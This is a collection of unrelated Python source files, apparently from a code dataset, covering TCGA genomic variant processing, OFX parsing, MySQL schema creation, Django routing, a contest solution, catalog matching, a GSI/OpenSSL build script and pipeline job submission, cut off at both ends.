'TCGA-AB-2935']:\n pass\n elif case == 'TCGA-AB-2869':\n if k['experiment_name'] == \"H_KA-141273-0927521\":\n key = case_to_barcode[case]\n Y = True\n else:\n key = case_to_barcode[case]\n Y = True\n else:\n if cancer_dict[case] == 'LUSC':\n sample = k['experiment_name'][10:].replace('TP', '01A')\n temp_sample = case_to_barcode[case][8:]\n if sample == temp_sample:\n key = case_to_barcode[case]\n Y = True\n else:\n ##handle the mislabeled SKCM cases here\n if case in ['TCGA-HR-A2OH', 'TCGA-HR-A2OG', 'TCGA-D9-A4Z6', 'TCGA-D9-A1X3']:\n sample = k['experiment_name'].replace('01A', '06A')\n if sample == case_to_barcode[case]:\n key = case_to_barcode[case]\n Y = True\n else:\n # these BRCA cases have some sort of mislabel, not sure what to do:['TCGA-BH-A1EU', 'TCGA-A2-A04T', 'TCGA-E2-A15I']\n pass\n if Y== False:\n temp_sample = case_to_barcode[case][5:20]\n if sample == temp_sample:\n key = case_to_barcode[case]\n Y = True\n if Y == True:\n key = key[:15]\n data[key] = data.get(key, {'centers': [], 'kits': [], 'beds': []})\n data[key].update([('centers', data[key]['centers'] + [k['sequencing_center']]),\\\n ('kits', data[key]['kits'] + [k['target_capture_kit_name']]),\\\n ('beds', data[key]['beds'] + [k['target_capture_kit_target_region']])])\n\n\n\nbad_kits=['Gapfiller_7m','NimbleGen Sequence Capture 2.1M Human Exome Array']\nbad_beds=['https://bitbucket.org/cghub/cghub-capture-kit-info/raw/c38c4b9cb500b724de46546fd52f8d532fd9eba9/BI/vendor/Agilent/tcga_6k_genes.targetIntervals.bed',\n'https://bitbucket.org/cghub/cghub-capture-kit-info/raw/c38c4b9cb500b724de46546fd52f8d532fd9eba9/BI/vendor/Agilent/cancer_2000gene_shift170.targetIntervals.bed']\n\nbad_samples = []\nnull_samples = []\n\nfor sample in tcga_sample_table['Tumor_Sample_Barcode']:\n sample = sample[:15]\n if sample not in data:\n null_samples.append(sample)\n else:\n X = False\n for kit, bed in zip(data[sample]['kits'], data[sample]['beds']):\n if not kit:\n null_samples.append(sample)\n else:\n for sub_kit, sub_bed in zip(kit.split('|'), bed.split('|')):\n if sub_kit not in bad_kits:\n if sub_bed not in bad_beds:\n X = True\n break\n if X == False:\n bad_samples.append(sample)\n\n##add columns to the sample table\ntcga_sample_table['Exome_Covered'] = ~tcga_sample_table['Tumor_Sample_Barcode'].str[:15].isin(bad_samples + null_samples)\ntcga_sample_table['Exome_Unknown'] = tcga_sample_table['Tumor_Sample_Barcode'].str[:15].isin(null_samples)\n\n##sample table is done, save to file\npickle.dump(tcga_sample_table, open(file_path / 'tcga_sample_table_controlled.pkl', 'wb'))\n\n\nchromosomes = {}\nfor i in list(range(1, 23))+['X', 'Y']:\n with open(file_path / 'chromosomes' / ('chr' + str(i) + '.txt')) as f:\n chromosomes[str(i)] = f.read()\n\n\n##Use GFF3 to annotate variants\n##ftp://ftp.ensembl.org/pub/grch37/current/gff3/homo_sapiens/\ngff = pd.read_csv(file_path / 'Homo_sapiens.GRCh37.87.gff3',\n sep='\\t',\n names=['chr', 'unknown', 'gene_part', 'start', 'end', 'unknown2', 'strand', 'unknown3', 'gene_info'],\n usecols=['chr','gene_part', 'start', 'end', 'gene_info'],\n low_memory=False)\n\n\ngff_cds_pr = pr.PyRanges(gff.loc[(gff['gene_part'] == 'CDS') & gff['chr'].isin(chromosomes), ['chr', 'start', 'end', 'gene_info']].astype({'start': int, 'end': int}).rename(columns={'chr': 'Chromosome', 'start': 'Start', 'end': 'End'})).merge()\ngff_exon_pr = pr.PyRanges(gff.loc[(gff['gene_part'] == 'exon') & gff['chr'].isin(chromosomes), ['chr', 'start', 'end', 'gene_info']].astype({'start': int, 'end': int}).rename(columns={'chr': 'Chromosome', 'start': 'Start', 'end': 'End'})).merge()\ndel gff\n\n##make index column for merging\ntcga_maf['index'] = tcga_maf.index.values\n\nmaf_pr = pr.PyRanges(tcga_maf.loc[:, ['Chromosome', 'Start_Position', 'End_Position', 'index']].rename(columns={'Start_Position': 'Start', 'End_Position': 'End'}))\n\n##use the genie 7.0 panels: https://www.synapse.org/#!Synapse:syn21551261\ngenie = pd.read_csv(file_path / 'genomic_information.txt', sep='\\t', low_memory=False)\npanels = genie.SEQ_ASSAY_ID.unique()\npanel_df = pd.DataFrame(data=panels, columns=['Panel'])\n\n\n##http://hgdownload.cse.ucsc.edu/goldenPath/hg19/database/simpleRepeat.txt.gz\nrepeats = pd.read_csv(file_path / 'simpleRepeat.txt', sep='\\t', low_memory=False, header=None, usecols=[1, 2, 3])\nrepeats[1] = repeats[1].str.replace('chr', '')\nrepeats.rename(columns={1: 'Chromosome', 2: 'Start', 3: 'End'}, inplace=True)\nrepeats_pr = pr.PyRanges(repeats.loc[repeats['Chromosome'].isin(chromosomes)]).merge()\n\ntotal_sizes = []\ncds_sizes = []\nexon_sizes = []\npanel_prs = []\n\nfor panel in panels:\n print(panel)\n panel_pr = pr.PyRanges(genie.loc[(genie['SEQ_ASSAY_ID'] == panel) & genie['Chromosome'].isin(chromosomes), 'Chromosome':'End_Position'].rename(columns={'Start_Position': 'Start', 'End_Position': 'End'})).merge()\n total_sizes.append(sum([i + 1 for i in panel_pr.lengths()]))\n cds_sizes.append(sum([i + 1 for i in panel_pr.intersect(gff_cds_pr).lengths()]))\n exon_sizes.append(sum([i + 1 for i in panel_pr.intersect(gff_exon_pr).lengths()]))\n panel_prs.append(panel_pr)\n\n\ngrs = {k: v for k, v in zip(['repeat', 'CDS', 'exon'] + list(panels), [repeats_pr, gff_cds_pr, gff_exon_pr] + panel_prs)}\nresult = pr.count_overlaps(grs, pr.concat({'maf': maf_pr}.values()))\nresult = result.df\n\ntcga_maf = pd.merge(tcga_maf, result.iloc[:, 3:], how='left', on='index')\n\npanel_df['total'] = total_sizes\npanel_df['cds'] = cds_sizes\npanel_df['exon'] = exon_sizes\n\n##get assumed size of the most common kit: https://bitbucket.org/cghub/cghub-capture-kit-info/src/master/BI/vendor/Agilent/whole_exome_agilent_1.1_refseq_plus_3_boosters.targetIntervals.bed\nagilent_df = pd.read_csv(file_path / 'whole_exome_agilent_1.1_refseq_plus_3_boosters.targetIntervals.bed', sep='\\t', low_memory=False, header=None)\nkit_pr = pr.PyRanges(agilent_df.rename(columns={0: 'Chromosome', 1: 'Start', 2: 'End'})).merge()\nkit_total = sum([i + 1 for i in kit_pr.lengths()])\nkit_cds = sum([i + 1 for i in kit_pr.intersect(gff_cds_pr).merge().lengths()])\nkit_exon = sum([i + 1 for i in kit_pr.intersect(gff_exon_pr).merge().lengths()])\n\npanel_df = panel_df.append({'Panel': 'Agilent_kit', 'total': kit_total, 'cds': kit_cds, 'exon': kit_exon}, ignore_index=True)\n\n\ndef variant_features(maf, ref_length=20, alt_length=20, five_p_length=20, three_p_length=20):\n refs = []\n alts = []\n five_ps = []\n three_ps = []\n if ref_length % 2 != 0:\n ref_length += 1\n print('Your ref length was not even, incrementing by 1.')\n if alt_length % 2 != 0:\n alt_length += 1\n print('Your alt length was not even, incrementing by 1.')\n\n for index, row in enumerate(maf.itertuples()):\n Ref = row.Reference_Allele\n Alt = row.Tumor_Seq_Allele2\n Chr = str(row.Chromosome)\n Start = row.Start_Position\n End = row.End_Position\n if pd.isna(Alt):\n print(str(index)+' Alt is nan')\n Ref = np.nan\n Alt = np.nan\n context_5p = np.nan\n context_3p = np.nan\n else:\n if len(Ref) > ref_length:\n Ref = Ref[:int(ref_length / 2)] + Ref[-int(ref_length / 2):]\n else:\n while len(Ref) < ref_length:\n Ref += '-'\n if len(Alt) > alt_length:\n Alt = Alt[:int(alt_length / 2)] + Alt[-int(alt_length / 2):]\n else:\n while len(Alt) < alt_length:\n Alt += '-'\n if row.Reference_Allele == '-':\n ##the TCGA coordinates for a null ref are a little weird\n assert Start-five_p_length >= 0\n context_5p = chromosomes[Chr][Start-five_p_length:Start]\n context_3p = chromosomes[Chr][Start:Start+three_p_length]\n else:\n assert Start-(five_p_length+1) >= 0\n context_5p = chromosomes[Chr][Start-(five_p_length+1):Start-1]\n context_3p = chromosomes[Chr][End:End+three_p_length]\n refs.append(Ref)\n alts.append(Alt)\n five_ps.append(context_5p)\n three_ps.append(context_3p)\n return refs, alts, five_ps, three_ps\n\ntcga_maf['Ref'], tcga_maf['Alt'], tcga_maf['five_p'], tcga_maf['three_p'] = variant_features(tcga_maf)\n\ntcga_maf.drop(columns=['index'], inplace=True)\n\npickle.dump(tcga_maf, open(file_path / 'tcga_maf_table_controlled.pkl', 'wb'), protocol=4)\npickle.dump(panel_df, open(file_path / 'tcga_panel_table_controlled.pkl', 'wb')) ##should be same as tcga_panel_table\n\n","sub_path":"files/process_tcga_mc3_controlled.py","file_name":"process_tcga_mc3_controlled.py","file_ext":"py","file_size_in_byte":16464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"292725246","text":"#!/usr/bin/python3\n\nimport codecs\n\nfrom ofxparse import OfxParser\nwith codecs.open('file.ofx') as fileobj:\n ofx = OfxParser.parse(fileobj)\n\n# The OFX object\n\nofx.account # An Account object\n\n# AccountType\n# (Unknown, Bank, CreditCard, Investment)\n\n# Account\naccount = ofx.account\naccount.account_id # The account number\naccount.routing_number # The bank routing number\naccount.branch_id # Transit ID / branch number\naccount.type # An AccountType object\naccount.statement # A Statement object\naccount.institution # An Institution object\n\n# InvestmentAccount(Account)\n\n#account.brokerid # Investment broker ID\naccount.statement # An InvestmentStatement object\n\n# Institution\n\ninstitution = account.institution\n#institution.organization\n#institution.fid\n\n# Statement\n\nstatement = account.statement\nstatement.start_date # The start date of the transactions\nstatement.end_date # The end date of the transactions\nstatement.balance # The money in the account as of the statement date\nstatement.available_balance # The money available from the account as of the statement date\nstatement.transactions # A list of Transaction objects\n\n# InvestmentStatement\n\nstatement = account.statement\nstatement.positions # A list of Position objects\nstatement.transactions # A list of InvestmentTransaction objects\n\n# Transaction\n\nfor transaction in statement.transactions:\n transaction.payee\n transaction.type\n transaction.date\n transaction.amount\n transaction.id\n transaction.memo\n transaction.sic\n transaction.mcc\n transaction.checknum\n\n# InvestmentTransaction\n\nfor transaction in statement.transactions:\n transaction.type\n transaction.tradeDate\n transaction.settleDate\n transaction.memo\n transaction.security # A Security object\n transaction.income_type\n transaction.units\n transaction.unit_price\n transaction.comission\n transaction.fees\n transaction.total\n transaction.tferaction\n\n# Positions\n\nfor position in statement.positions:\n position.security # A Security object\n position.units\n position.unit_price\n position.market_value\n\n# Security\n\nsecurity = transaction.security\n# or\nsecurity = position.security\nsecurity.uniqueid\nsecurity.name\nsecurity.ticker\nsecurity.memo","sub_path":"venv/ofxparsetest.py","file_name":"ofxparsetest.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"540738387","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jun 11 11:13:17 2021\r\n\r\n@author: Vadym\r\n\"\"\"\r\n\r\nimport os\r\nimport pandas as pd\r\n\r\nos.chdir(\"data\")\r\n\r\nresources_file = \"资源信息.csv\"\r\nresources_df = pd.read_csv(resources_file)\r\nassets_file ='资产信息.csv'\r\nassets_df = pd.read_csv(assets_file)\r\nassets_df = assets_df.rename(columns={\"ASSETSNAME\":\"NAME\",\"ASSETID\":\"ID\"})\r\nresources_df = resources_df.rename(columns={\"RESOURCENAME\":\"NAME\",\"RESOURCEID\":\"ID\"})\r\nresources_columns = resources_df.columns.tolist()\r\nassets_columns = assets_df.columns.tolist()\r\nall_columns = resources_columns + assets_columns\r\ncommon_columns = []\r\nfor col in all_columns:\r\n if col in resources_columns and col in assets_columns and col not in common_columns:\r\n common_columns.append(col)\r\nfiltered_resources_df = resources_df.filter(common_columns, axis=1)\r\nfiltered_assets_df = assets_df.filter(common_columns, axis=1)\r\nres_df = filtered_assets_df.append(filtered_resources_df)\r\n#res_df.drop(res_df.columns[1], axis = 1, inplace = True)\r\n\r\nres_df.to_csv(\"assets_resources.csv\") \r\n\r\nprint(res_df)\r\n","sub_path":"assets_resources2.py","file_name":"assets_resources2.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"445335717","text":"from __future__ import print_function\nimport mysql.connector as mysqli\nfrom mysql.connector import errorcode\ndef create_database(cursor):\n try:\n cursor.execute(\n \"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".format(DB_NAME))\n except mysqli.Error as err:\n print(\"Failed creating database: {}\".format(err))\n exit(1)\n try:\n cnx.database = DB_NAME \n except mysqli.Error as err:\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor)\n cnx.database = DB_NAME\n else:\n print(err)\n exit(1)\n\nDB_NAME = 'hydroponytest'\n\nTABLES = {}\nTABLES['employees'] = (\n \"CREATE TABLE employees (\"\n \" emp_no int(11) NOT NULL AUTO_INCREMENT,\"\n \" birth_date date NOT NULL,\"\n \" first_name varchar(14) NOT NULL,\"\n \" last_name varchar(16) NOT NULL,\"\n \" gender enum('M','F') NOT NULL,\"\n \" hire_date date NOT NULL, \"\n \" PRIMARY KEY (emp_no) \"\n \" ) ENGINE innoDB\")\nTABLES['departments']= (\n \"CREATE TABLE departments (\"\n \" dept_no char(4) NOT NULL,\"\n \" dept_name varchar(40) NOT NULL,\"\n \" PRIMARY KEY (dept_no), UNIQUE KEY dept_name (dept_name)\"\n \" ) ENGINE innoDB\")\n\nTABLES['salaries'] = (\n \"CREATE TABLE salaries (\"\n \" emp_no int(11) NOT NULL,\"\n \" salary int(11) NOT NULL,\"\n \" from_date date NOT NULL,\"\n \" to_date date NOT NULL,\"\n \" PRIMARY KEY (emp_no,from_date), KEY emp_no (emp_no),\"\n \" CONSTRAINT salaries_ibfk_1 FOREIGN KEY (emp_no) \"\n \" REFERENCES employees (emp_no) ON DELETE CASCADE\"\n \") ENGINE=InnoDB\")\n\nTABLES['deptemp'] = (\n \"CREATE TABLE deptemp (\"\n \" emp_no int(11) NOT NULL,\"\n \" dept_no char(4) NOT NULL,\"\n \" from_date date NOT NULL,\"\n \" to_date date NOT NULL,\"\n \" PRIMARY KEY (emp_no,dept_no), KEY emp_no (emp_no),\"\n \" KEY dept_no (dept_no),\"\n \" CONSTRAINT dept_emp_ibfk_1 FOREIGN KEY (emp_no) \"\n \" REFERENCES employees (emp_no) ON DELETE CASCADE,\"\n \" CONSTRAINT dept_emp_ibfk_2 FOREIGN KEY (dept_no) \"\n \" REFERENCES departments (dept_no) ON DELETE CASCADE\"\n \") ENGINE=InnoDB\")\n\nTABLES['deptmanager'] = (\n \" CREATE TABLE deptmanager (\"\n \" dept_no char(4) NOT NULL,\"\n \" emp_no int(11) NOT NULL,\"\n \" from_date date NOT NULL,\"\n \" to_date date NOT NULL,\"\n \" PRIMARY KEY (emp_no,dept_no),\"\n \" KEY emp_no (emp_no),\"\n \" KEY dept_no (dept_no),\"\n \" CONSTRAINT dept_manager_ibfk_1 FOREIGN KEY (emp_no) \"\n \" REFERENCES employees (emp_no) ON DELETE CASCADE,\"\n \" CONSTRAINT dept_manager_ibfk_2 FOREIGN KEY (dept_no) \"\n \" REFERENCES departments (dept_no) ON DELETE CASCADE\"\n \") ENGINE=InnoDB\")\n\nTABLES['titles'] = (\n \"CREATE TABLE titles (\"\n \" emp_no int(11) NOT NULL,\"\n \" title varchar(50) NOT NULL,\"\n \" from_date date NOT NULL,\"\n \" to_date date DEFAULT NULL,\"\n \" PRIMARY KEY (emp_no,title,from_date), KEY emp_no (emp_no),\"\n \" CONSTRAINT titles_ibfk_1 FOREIGN KEY (emp_no)\"\n \" REFERENCES employees (emp_no) ON DELETE CASCADE\"\n \") ENGINE=InnoDB\")\n\nconfig = {\n 'user': 'root',\n 'password': 'ffuswgwy',\n 'host': '127.0.0.1',\n 'database':'hydroponytest'\n }\n\ncnx = mysqli.connect(**config)\n\ncursor = cnx.cursor()\n#create_database(cursor)\n#cnx.database = 'hydropony'\nfor name,dd1 in TABLES.items():\n try:\n print(\"Creating table {}: \".format(name),end=\"\")\n cursor.execute(dd1)\n except mysqli.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"already exists.\")\n else:\n print(err.msg)\n else:\n print('OK')\n\n\ncursor.close()\ncnx.close()\n\n\n\n\n\n","sub_path":"mysqltest.py","file_name":"mysqltest.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"156844695","text":"\"\"\"bbs URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path,re_path\nfrom blog import views\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('index/', views.index),\n path('', views.index),\n path('login/', views.login),\n path('logout/', views.logout),\n path('digg/', views.digg),\n path('comment/', views.comment),\n path('backstage/', views.backstage),\n path('upload/', views.upload),\n path('delarticle/', views.delarticle),\n re_path('update_article/(?P\\d+)', views.update_article),\n path('addarticles/', views.addarticles),\n re_path('(?P\\w+)/articles/(?P\\d+)', views.articles),\n re_path('(?P\\w+)/(?Pcategory|tag|date)/(?P.*)', views.homesite),\n re_path('(?P\\w+)', views.homesite),\n]\n","sub_path":"bbs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"641234490","text":"def solve(cost_cj, cost_jc ,mural):\n\t#print('cost_cj: {} cost_jc: {}, mural: {}'.format(cost_cj, cost_jc, mural))\n\n\tmural = cleaner(mural)\n\t#print('mural: {}'.format(mural))\n\n\tcount_cj = mural.count(\"CJ\")\n\t#print('count_cj: {}'.format(count_cj))\n\n\tcount_jc = mural.count(\"JC\")\n\t#print('count_jc: {}'.format(count_jc))\n\n\tcost = count_cj * cost_cj + count_jc * cost_jc\n\t#print('cost: {}'.format(cost))\n\n\treturn cost\n\n\n\ndef cleaner(mural):\n\tmural = list(mural)\n\n\toutlist = []\n\n\tfor ch in mural:\n\t\tif ch not in ('?', '\\n'):\n\t\t\toutlist.append(ch)\n\n\t# return (outlist)\n\tout = ''.join(outlist)\n\treturn out\n\n\ndef main():\n\t\n\tT = int(input())\n\t\n\tfor t in range(1, T + 1):\n\t\t\n\t\tline = [x for x in input().split(\" \")]\n\t\tx = int(line[0])\n\t\ty = int(line[1])\n\t\tmural = line[2]\n\n\t\tsol = solve(x, y, mural)\n\t\tprint (\"Case #{}: {}\".format(t, sol))\n\t\n\nif __name__ == \"__main__\":\n\tmain()\n\n\t\n\n","sub_path":"2021/qualification_round/moons_and_umbrellas/moons_stdin.py","file_name":"moons_stdin.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"200886118","text":"\"\"\"\nCatalog manipulation and lookup utilities\n\nNOT IMPLEMENTED\n\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport numpy as np\nimport os\nimport sys\nfrom astropy.io import fits\n\nif sys.version_info[0] == 3:\n xrange = range\n\n# download from https://github.com/cristobal-sifon/readfile\nimport readfile\n\n\ndef crossmatch(cat1, cat2, cols1=0, cols2=0, tolerance=0, relative=0):\n \"\"\"\n Cross-match two catalogs according to some user-specified criteria\n\n Parameters\n ----------\n cat1,cat2 : np.ndarray or dict\n Whatever values should be cross-matched in each catalog.\n They could be object names, coordinates, etc, and there may\n be more than one entry per catalog.\n cols1,cols2 : list of int or list of str\n The column number(s) in each catalog to use. Both must have\n the same number of entries. Ignored if cat1,cat2 are single\n columns. If cat1 or cat2 is/are dict, then the\n corresponding col1/col2 must be a list of strings with\n entry names in the catalog.\n tolerance : float\n relative or absolute tolerance when comparing to arrays of\n numbers. If set to zero, matching will be exact.\n relative : int (0,1,2)\n Whether the tolerance is an absolute value (0), or with\n respect to the values in cat1 or cat2.\n\n Returns\n ------\n match1,match2 : (array of) boolean arrays\n Mask arrays containing True for objects that pass the\n matching criteria and False for those that don't\n\n \"\"\"\n cats = [cat1, cat2]\n cols = [cols1, cols2]\n # need to check the depth of cat1,cat2 and always make 2d\n for i in xrange(2):\n if len(np.array(cats[i]).shape) == 1:\n cats[i] = [cats[i]]\n # check the format of col1,col2 depending on the format of cat1,cat2\n msg = ''\n for i in xrange(2):\n # make them all arrays for easier testing\n if isinstance(cols[i], int) or isinstance(cols[i], basestring):\n cols[i] = [cols]\n elif not hasattr(cols[i], '__iter__'):\n msg = 'cols{0} can only be an int or a string or'.format(i+1)\n msg = '{0} a list of either'.format(msg)\n if isinstance(cats[i], dict):\n if not isinstance(cols[i], basestring):\n msg = 'cat{0} is a dictionary so cols{0} must'.format(i+1)\n msg = '{0} be a (list of) string(s)'.format(msg)\n else:\n if not isinstance(cols[i], int):\n msg = 'cat{0} is array-like so cols{0} must'.format(i+1)\n msg = '{0} be a (list of) int(s)'.format(msg)\n if msg:\n raise TypeError(msg)\n # separate catalogs and columns again\n cat1, cat2 = cats\n cols1, cols2 = cols\n # now generate the conditions by looping through both catalogs\n #for \n","sub_path":"astro/catalogs.py","file_name":"catalogs.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"77970569","text":"# @(#) $Id$\n\"\"\"\nInstallation script for the GSI module\n\"\"\"\n#import ez_setup\n#ez_setup.use_setuptools()\n\nimport os\nimport ConfigParser\n\nfrom setuptools import setup, find_packages, Extension\n\nhere = os.path.realpath(os.path.dirname(__file__))\nsrcDir = os.path.join(here, \"src\")\n\nconfig = ConfigParser.SafeConfigParser()\nconfig.read(os.path.join(here, \"setup.cfg\"))\n\ndef findFiles(baseDir, validFileExts):\n files = []\n for t in os.walk(baseDir):\n for fileInDir in t[2]:\n for fext in validFileExts:\n fPos = len(fileInDir) - len(fext)\n if fileInDir.find(fext, fPos) == fPos:\n files.append(os.path.join(baseDir, fileInDir))\n return files\n\ndef createExtension(extName):\n extDir = os.path.join(srcDir, extName.lower())\n cFiles = [os.path.join(srcDir, \"util.c\")] + findFiles(extDir, \".c\")\n hFiles = [os.path.join(srcDir, \"util.h\")] + findFiles(extDir, \".h\")\n extraArgs = {}\n if 'Extensions' in config.sections():\n for k in config.options('Extensions'):\n extraArgs[k] = [v.strip() for v in config.get('Extensions', k).split(\" \") if v.strip()]\n for i in range(len(extraArgs[k])):\n if os.path.isfile(extraArgs[k][i]):\n extraArgs[k][i] = os.path.realpath(extraArgs[k][i])\n return Extension(\"GSI.%s\" % extName,\n cFiles,\n depends=hFiles,\n libraries=['ssl', 'crypto'],\n extra_compile_args=[\"-Wno-deprecated-declarations\", \"-std=c99\"],\n ** extraArgs\n )\n\n# Get the long description from the README file\nwith open(os.path.join(here, 'README.rst')) as f:\n long_description = f.read()\n\nsetup(\n name=\"GSI\",\n version='0.6.5',\n description=\"Python wrapper module around the OpenSSL library\",\n long_description=long_description,\n url='https://github.com/DIRACGrid/pyGSI',\n author=\"Adrian Casajus\",\n author_email=\"adria@ecm.ub.es\",\n license=\"GPLv3\",\n # See https://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n #'Topic :: GSI to python :: Grid proxy certificates', #only for non-sdst packages\n\n # Pick your license as you wish (should match \"license\" above)\n #'License :: OSI Approved :: GPLv3 License',#only for non-sdst packages\n\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n ],\n packages=find_packages(exclude=['contrib', 'docs', 'tests*']),\n zip_safe=False,\n #install_requires = [\"distribute>0.6\", \"pip\"],\n python_requires='>=2.7',\n py_modules=['GSI.__init__', 'GSI.tsafe', 'GSI.version'],\n ext_modules=[createExtension(extName) for extName in (\"crypto\", \"rand\", \"SSL\")]\n)\n","sub_path":"pypi_install_script/GSI-0.6.5.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"38778142","text":"__author__ = 'sathley'\n\nfrom . import AppacitiveObject, AppacitiveConnection, GraphNode\nimport types\n\n\ndef convert_node(node):\n return parse_graph_node(None, None, None, node)\n\n\ndef parse_graph_node(parent, name, parent_label, node):\n\n # parse article\n current = GraphNode()\n node_clone = node.copy()\n for k, __ in node.iteritems():\n if k == '__edge' or k == '__children':\n node_clone.pop(k)\n current.object = AppacitiveObject(node_clone)\n\n if parent is not None:\n edge = node.get('__edge', None)\n if edge is not None:\n edge_clone = edge.copy()\n current.connection = parse_connection(parent_label, parent.object, current.object, edge_clone)\n\n children = node.get('__children', None)\n if children is not None:\n for k, v in children.iteritems():\n if isinstance(v, types.DictionaryType):\n parse_child_nodes(k, v, current)\n\n if parent is not None:\n parent.add_child_node(name, current)\n\n return current\n\n\ndef parse_child_nodes(name, d, current):\n parent_label = d.get('parent', None)\n values = d['values']\n if isinstance(values, types.ListType):\n for value in values:\n parse_graph_node(current, name, parent_label, value)\n\n\ndef parse_connection(parent_label, parent_object, current_object, d):\n\n label = d.get('__label', None)\n relation_type = d.get('__relationtype', None)\n conn_id = int(d.get('__id', 0))\n\n connection = AppacitiveConnection(d)\n connection.relation_type = relation_type\n connection.id = conn_id\n connection.endpoint_a.label = parent_label\n connection.endpoint_a.object = parent_object\n connection.endpoint_a.objectid = parent_object.id\n\n connection.endpoint_b.label = label\n connection.endpoint_b.object = current_object\n connection.endpoint_b.objectid = current_object.id\n\n return connection","sub_path":"pyappacitive/nodehelper.py","file_name":"nodehelper.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"599002053","text":"\"\"\"\nFile: PDF_ReportApplyMain.py\nAuthors: Ryan J. Urbanowicz, Richard Zhang, Wilson Zhang\nInstitution: University of Pensylvania, Philadelphia PA\nCreation Date: 6/1/2021\nLicense: GPL 3.0\nDescription: Phase 11 of AutoMLPipe-BC (Optional)- This 'Main' script manages Phase 10 run parameters, and submits job to run locally (to run serially) or on a linux computing\n cluster (parallelized). This script runs PDF_ReportApplyJob.py which generates a formatted PDF summary report of key pipeline results (applying trained models to\n hold out replication data). All 'Main' scripts in this pipeline have the potential to be extended by users to submit jobs to other parallel computing frameworks\n (e.g. cloud computing).\nWarnings: Designed to be run following the completion of either AutoMLPipe-BC Phase 6 (StatsMain.py), Phase 7 (DataCompareMain.py), and or Phase 8 (KeyFileCopyMain.py).\nSample Run Command (Linux cluster parallelized with all default run parameters):\n python PDF_ReportApplyMain.py --rep-path /Users/robert/Desktop/RepDatasets --dataset /Users/robert/Desktop/Datasets/targetData1.csv --out-path /Users/robert/Desktop/outputs --exp-name myexperiment1\nSample Run Command (Local/serial with with all default run parameters):\n python PDF_ReportApplyMain.py --rep-path /Users/robert/Desktop/RepDatasets --dataset /Users/robert/Desktop/Datasets/targetData1.csv --out-path /Users/robert/Desktop/outputs --exp-name myexperiment1 --run-parallel False\n\"\"\"\n#Import required packages ---------------------------------------------------------------------------------------------------------------------------\nimport os\nimport re\nimport sys\nimport argparse\nimport time\n\ndef main(argv):\n #Parse arguments\n parser = argparse.ArgumentParser(description=\"\")\n #No defaults\n parser.add_argument('--rep-path',dest='rep_data_path',type=str,help='path to directory containing replication or hold-out testing datasets (must have at least all features with same labels as in original training dataset)')\n parser.add_argument('--dataset',dest='data_path',type=str,help='path to target original training dataset')\n parser.add_argument('--out-path',dest='output_path',type=str,help='path to output directory')\n parser.add_argument('--exp-name', dest='experiment_name',type=str, help='name of experiment output folder (no spaces)')\n #Lostistical arguments\n parser.add_argument('--run-parallel',dest='run_parallel',type=str,help='if run parallel',default=\"True\")\n parser.add_argument('--queue',dest='queue',type=str,help='specify name of parallel computing queue (uses our research groups queue by default)',default=\"i2c2_normal\")\n parser.add_argument('--res-mem', dest='reserved_memory', type=int, help='reserved memory for the job (in Gigabytes)',default=4)\n parser.add_argument('--max-mem', dest='maximum_memory', type=int, help='maximum memory before the job is automatically terminated',default=15)\n\n options = parser.parse_args(argv[1:])\n job_counter = 0\n experiment_path = options.output_path+'/'+options.experiment_name\n\n if eval(options.run_parallel):\n job_counter += 1\n submitClusterJob(experiment_path,options.rep_data_path,options.data_path,options.reserved_memory,options.maximum_memory,options.queue)\n else:\n submitLocalJob(experiment_path,options.rep_data_path,options.data_path)\n\n print(str(job_counter)+ \" job submitted in Phase 11\")\n\ndef submitLocalJob(experiment_path):\n \"\"\" Runs PDF_ReportApplyJob.py locally, once. \"\"\"\n KeyFileCopyJob.job(experiment_path,rep_data_path,data_path)\n\ndef submitClusterJob(experiment_path,rep_data_path,data_path,reserved_memory,maximum_memory,queue):\n \"\"\" Runs PDF_ReportApplyJob.py once. Runs on a linux-based computing cluster that uses an IBM Spectrum LSF for job scheduling.\"\"\"\n job_ref = str(time.time())\n job_name = experiment_path + '/jobs/PDF_Apply_' + job_ref + '_run.sh'\n sh_file = open(job_name,'w')\n sh_file.write('#!/bin/bash\\n')\n 